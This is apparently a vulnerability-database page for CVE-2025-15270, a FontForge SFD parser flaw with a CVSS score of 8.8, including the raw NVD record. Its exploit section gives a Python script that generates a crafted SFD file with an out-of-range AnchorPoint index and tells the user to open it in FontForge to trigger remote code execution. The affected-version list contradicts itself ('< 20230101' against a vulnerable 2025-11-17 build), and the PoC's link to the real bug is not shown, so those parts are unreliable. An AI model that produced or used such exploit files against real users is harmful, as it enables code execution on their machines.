Security Vulnerability Report
CVE-2025-15270 CVSS 8.8 HIGH

CVE-2025-15270

Published: 2025-12-31 07:15:51
Last Modified: 2026-01-07 16:11:15

Description

FontForge SFD File Parsing Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated array. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28563.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fontforge:fontforge:2025-11-17:*:*:*:*:*:*:* - VULNERABLE
FontForge < 20230101 (all unpatched versions)
FontForge versions related to the SFD parser

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-15270 PoC - FontForge SFD File Array Index Validation Issue
# Generate malicious SFD file to trigger out-of-bounds write
import struct
import sys


def create_malicious_sfd():
    """Generate a malicious SFD file with out-of-bounds array index"""
    # SFD file header
    sfd_content = "SplineFontDB: 3.0\n"
    sfd_content += "FontName: MaliciousFont\n"
    sfd_content += "FullName: Malicious Font\n"
    sfd_content += "FamilyName: Malicious Family\n"
    sfd_content += "Version: 1.0\n"
    sfd_content += "Encoding: iso10646-1\n"
    sfd_content += "BeginChars: 256 256\n"

    # Create glyph with malicious array index
    # This triggers the improper validation vulnerability
    malicious_index = 0xFFFFFFFF  # Out of bounds index
    sfd_content += f"""BeginGlyph: A 1
Width: 1000
VWidth: 0
Flags: W
AnchorPoint: "top" {malicious_index} 0 basechar 0 0 ""
EndSplineSet
EndChar
"""
    sfd_content += "EndChars\n"
    sfd_content += "EndFont\n"
    return sfd_content


def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15270-poc.py <output.sfd>")
        print("This PoC generates a malicious SFD file for FontForge")
        sys.exit(1)

    output_file = sys.argv[1]
    sfd_data = create_malicious_sfd()
    with open(output_file, 'w') as f:
        f.write(sfd_data)

    print(f"[+] Malicious SFD file created: {output_file}")
    print(f"[+] Open this file with FontForge to trigger the vulnerability")


if __name__ == "__main__":
    main()

# Additional exploitation notes:
# 1. The vulnerability is in FontForge's SFD file parser
# 2. Attack vector: User must open the malicious SFD file
# 3. Result: Out-of-bounds write leading to RCE
# 4. CVSS 8.8 - Network based, low complexity, requires user interaction

References

https://www.zerodayinitiative.com/advisories/ZDI-25-1194/ (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15270", "sourceIdentifier": "[email protected]", "published": "2025-12-31T07:15:50.897", "lastModified": "2026-01-07T16:11:14.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FontForge SFD File Parsing Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated array. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28563."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por validación incorrecta del índice de la matriz en el análisis de archivos SFD de FontForge. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de FontForge. Se requiere interacción del usuario para explotar esta vulnerabilidad, ya que el objetivo debe visitar una página maliciosa o abrir un archivo malicioso.\n\nLa falla específica reside en el análisis de archivos SFD. El problema se debe a la falta de validación adecuada de los datos proporcionados por el usuario, lo que puede resultar en una escritura más allá del final de una matriz asignada. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del usuario actual. Fue ZDI-CAN-28563."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-129"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fontforge:fontforge:2025-11-17:*:*:*:*:*:*:*", "matchCriteriaId": "F1A9337A-AD25-4C56-964A-CCD44CEF611F"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1194/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}